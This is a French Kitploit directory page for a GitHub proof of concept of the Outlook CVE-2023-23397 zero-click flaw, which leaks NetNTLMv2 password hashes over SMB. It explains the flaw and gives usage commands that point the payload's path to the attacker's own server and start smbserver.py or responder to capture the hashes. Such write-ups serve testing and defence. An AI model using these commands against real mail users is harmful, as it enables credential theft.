Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-23397 — Simple PoC de la vulnérabilité CVE-2023-23397 avec la charge utile envoyée par email. | Kitploit
Outils/GitHubGitHub/trackflaw/cve-2023-23397
Outils de PhishingAttaques de Mots de PasseGénération de PayloadsAnalyse des VulnérabilitésExploitationSécurité des Emails
GitHubtrackflaw/cve-2023-23397

CVE-2023-23397

Simple PoC de la vulnérabilité CVE-2023-23397 avec la charge utile envoyée par email.

Voir le dépôt
13228il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-23397

PoC simple et sale de la vulnérabilité CVE-2023-23397 impactant le client lourd Outlook.

Description

Outlook souffre d'un manque de contrôle sur l'entrée utilisateur qui permet de configurer le son d'un rappel de réunion ou de rendez-vous. En effet, un attaquant peut forcer une victime à se connecter à son serveur sans aucune manipulation de l'utilisateur (vulnérabilité zero click).

Un attaquant exploitant cette vulnérabilité récupère un digest NetNTLMv2 basé sur le mot de passe de l'utilisateur piégé via une requête SMB. La requête est déclenchée dès que le courrier arrive dans la boîte de réception.

Que fait le PoC ?

  1. Génère une charge utile .msg.
  2. L'envoie par courriel avec un serveur SMTP personnalisé.

Utilisation

Dans une session :

root@kitploit:~
python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

Dans une seconde session (smbserver ou responder au choix).

root@kitploit:~
smbserver.py -smb2support SHARE .

Démo (PoC manuel)

poc

Vidéo explicative (en français)

RÉCUPÉRER des mots de passe avec Microsoft OUTLOOK #CVE-2023-23397

Article original

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

Télécharger l’outil